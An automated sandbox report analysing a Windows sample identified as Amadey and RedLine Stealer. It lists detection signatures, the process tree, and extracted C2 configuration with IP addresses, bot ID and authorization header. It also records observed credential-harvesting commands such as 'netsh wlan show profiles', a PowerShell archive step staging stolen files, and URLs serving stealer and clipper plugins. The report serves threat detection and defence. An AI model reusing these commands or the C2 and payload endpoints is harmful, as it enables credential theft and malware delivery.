Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mggoBrtk9t.exe

Overview

General Information

Sample name:mggoBrtk9t.exe
renamed because original name is a hash value
Original sample name:dd1e3f38ae7711d270748012af613950.exe
Analysis ID:1574303
MD5:dd1e3f38ae7711d270748012af613950
SHA1:b3b90eec3507f523aa63802cc16e5248c8ef0ea8
SHA256:2997292293c332e73b11fa28126b6fbefea75a6bb02001eb017de46797d4e4ec
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionality to start a terminal service
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mggoBrtk9t.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\mggoBrtk9t.exe" MD5: DD1E3F38AE7711D270748012AF613950)
    • audiodg.exe (PID: 5620 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • svchost.exe (PID: 2012 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 2592 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • A629855EB2A22925382193.exe (PID: 5564 cmdline: "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe" MD5: DD1E3F38AE7711D270748012AF613950)
          • svchost.exe (PID: 3000 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 1884 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 740 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 56C7.tmp.ctx.exe (PID: 1596 cmdline: "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
          • 56C7.tmp.ctx.exe (PID: 2496 cmdline: "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe" MD5: AE2A4249C8389603933DF4F806546C96)
        • A629855EB2A22925382193.exe (PID: 3080 cmdline: "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe" MD5: DD1E3F38AE7711D270748012AF613950)
          • audiodg.exe (PID: 2184 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • svchost.exe (PID: 2376 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • msiexec.exe (PID: 2084 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 6148.tmp.ssg.exe (PID: 4040 cmdline: "C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • 759D.tmp.gfx.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
          • Gxtuum.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)
    • msiexec.exe (PID: 2704 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • Gxtuum.exe (PID: 5204 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
  • Gxtuum.exe (PID: 3076 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)
    • rundll32.exe (PID: 6432 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5696 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 6912 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7012 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 5672 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 2872 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 5680 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 1180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 964 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 6040 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5544 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}
{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                00000005.00000000.1347856091.000000000AFF0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                • 0x3cbad:$s2: ReflectiveLoader@
                00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                • 0x3ddad:$s2: ReflectiveLoader@
                00000005.00000003.1588276592.000000000A1EE000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                  00000011.00000000.1536966434.00000000007B2000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    00000011.00000002.1764205289.0000000002B86000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 4 entries
                      SourceRuleDescriptionAuthorStrings
                      34.2.rundll32.exe.6f6f0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        5.2.explorer.exe.c5b0000.3.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                        • 0x3ddad:$s2: ReflectiveLoader@
                        5.3.explorer.exe.bf9b350.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                        • 0x3cbad:$s2: ReflectiveLoader@
                        5.2.explorer.exe.aff0000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                        • 0x3b9ad:$s2: ReflectiveLoader@
                        18.2.759D.tmp.gfx.exe.4b0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          Click to see the 22 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5696, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 7012, ProcessName: powershell.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mggoBrtk9t.exe, ProcessId: 6568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
                          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5696, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 7012, ProcessName: powershell.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\mggoBrtk9t.exe", ParentImage: C:\Users\user\Desktop\mggoBrtk9t.exe, ParentProcessId: 6568, ParentProcessName: mggoBrtk9t.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2012, ProcessName: svchost.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5696, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 7012, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\mggoBrtk9t.exe", ParentImage: C:\Users\user\Desktop\mggoBrtk9t.exe, ParentProcessId: 6568, ParentProcessName: mggoBrtk9t.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 2012, ProcessName: svchost.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2872, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5680, ProcessName: netsh.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:19:04.901403+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.1149760TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:19:04.468315+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:10.204185+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:11.513947+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:11.961998+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:12.400353+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:12.859879+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:13.736992+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:14.356841+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:14.476950+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:16.091899+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:16.536536+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:16.972311+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:17.407692+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:17.846333+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:18.287580+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:18.801374+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:19.998470+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:20.489301+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:21.072324+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:21.938659+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:22.382676+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:22.819111+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:23.252378+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          2024-12-13T08:19:23.725939+010020432311A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:19:11.633705+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.1149760TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:18:49.337834+010020197142Potentially Bad Traffic192.168.2.1149726185.81.68.14780TCP
                          2024-12-13T08:19:00.225322+010020197142Potentially Bad Traffic192.168.2.1149748185.81.68.14780TCP
                          2024-12-13T08:19:05.196213+010020197142Potentially Bad Traffic192.168.2.1149761185.81.68.14780TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:19:04.468315+010020460451A Network Trojan was detected192.168.2.1149760185.81.68.1471912TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:07.300584+010028561471A Network Trojan was detected192.168.2.1149939185.81.68.14780TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:10.326543+010028561481A Network Trojan was detected192.168.2.1149946185.81.68.14880TCP
                          2024-12-13T08:20:16.971319+010028561481A Network Trojan was detected192.168.2.1149970185.81.68.14880TCP
                          2024-12-13T08:20:23.121550+010028561481A Network Trojan was detected192.168.2.1149998185.81.68.14880TCP
                          2024-12-13T08:20:29.362119+010028561481A Network Trojan was detected192.168.2.1150017185.81.68.14880TCP
                          2024-12-13T08:20:35.799427+010028561481A Network Trojan was detected192.168.2.1150036185.81.68.14880TCP
                          2024-12-13T08:20:42.159878+010028561481A Network Trojan was detected192.168.2.1150056185.81.68.14880TCP
                          2024-12-13T08:20:48.363593+010028561481A Network Trojan was detected192.168.2.1150073185.81.68.14880TCP
                          2024-12-13T08:20:54.595635+010028561481A Network Trojan was detected192.168.2.1150080185.81.68.14880TCP
                          2024-12-13T08:21:01.237510+010028561481A Network Trojan was detected192.168.2.1150088185.81.68.14880TCP
                          2024-12-13T08:21:07.535897+010028561481A Network Trojan was detected192.168.2.1150095185.81.68.14880TCP
                          2024-12-13T08:21:13.721615+010028561481A Network Trojan was detected192.168.2.1150103185.81.68.14880TCP
                          2024-12-13T08:21:20.018768+010028561481A Network Trojan was detected192.168.2.1150110185.81.68.14880TCP
                          2024-12-13T08:21:26.706061+010028561481A Network Trojan was detected192.168.2.1150118185.81.68.14880TCP
                          2024-12-13T08:21:33.179320+010028561481A Network Trojan was detected192.168.2.1150126185.81.68.14880TCP
                          2024-12-13T08:21:39.383695+010028561481A Network Trojan was detected192.168.2.1150134185.81.68.14880TCP
                          2024-12-13T08:21:46.208977+010028561481A Network Trojan was detected192.168.2.1150142185.81.68.14880TCP
                          2024-12-13T08:21:52.613527+010028561481A Network Trojan was detected192.168.2.1150149185.81.68.14880TCP
                          2024-12-13T08:21:59.065368+010028561481A Network Trojan was detected192.168.2.1150156185.81.68.14880TCP
                          2024-12-13T08:22:05.267999+010028561481A Network Trojan was detected192.168.2.1150165185.81.68.14880TCP
                          2024-12-13T08:22:11.721973+010028561481A Network Trojan was detected192.168.2.1150171185.81.68.14880TCP
                          2024-12-13T08:22:18.158976+010028561481A Network Trojan was detected192.168.2.1150179185.81.68.14880TCP
                          2024-12-13T08:22:24.361889+010028561481A Network Trojan was detected192.168.2.1150186185.81.68.14880TCP
                          2024-12-13T08:22:30.646659+010028561481A Network Trojan was detected192.168.2.1150194185.81.68.14880TCP
                          2024-12-13T08:22:37.002261+010028561481A Network Trojan was detected192.168.2.1150201185.81.68.14880TCP
                          2024-12-13T08:22:43.300199+010028561481A Network Trojan was detected192.168.2.1150209185.81.68.14880TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:18.626119+010028561501A Network Trojan was detected192.168.2.1149982185.81.68.14880TCP
                          2024-12-13T08:20:18.870922+010028561501A Network Trojan was detected192.168.2.1149983185.81.68.14880TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:18.474964+010028561511A Network Trojan was detected192.168.2.1149978185.81.68.14880TCP
                          2024-12-13T08:20:18.503049+010028561511A Network Trojan was detected192.168.2.1149977185.81.68.14880TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:07.277034+010028033053Unknown Traffic192.168.2.1149938185.81.68.14780TCP
                          2024-12-13T08:20:13.878638+010028033053Unknown Traffic192.168.2.1149958185.81.68.14780TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T08:20:17.125958+010028552391A Network Trojan was detected192.168.2.1149972185.81.68.14780TCP
                          2024-12-13T08:20:17.363862+010028552391A Network Trojan was detected192.168.2.1149973185.81.68.14780TCP
                          2024-12-13T08:20:18.626119+010028552391A Network Trojan was detected192.168.2.1149982185.81.68.14880TCP
                          2024-12-13T08:20:18.870922+010028552391A Network Trojan was detected192.168.2.1149983185.81.68.14880TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://185.81.68.147/46122658-3693405117-2476756634-1003Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/index.phpb8bAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jhAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/index.php#Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpsK1bRhSyTkkD9QYQDw4TYWGHLCsdncEYUAcAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpsAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/wsysAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/Plugins/cred64.dllAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpJU:Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll$Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/index.phpHo5Avira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/Fvu5jh4DbS/index.phpAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/7vhfjke3/Plugins/clip64.dllAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpndowsAvira URL Cloud: Label: phishing
                          Source: http://185.81.68.147/gfx.exeAvira URL Cloud: Label: malware
                          Source: http://185.81.68.148/JAvira URL Cloud: Label: phishing
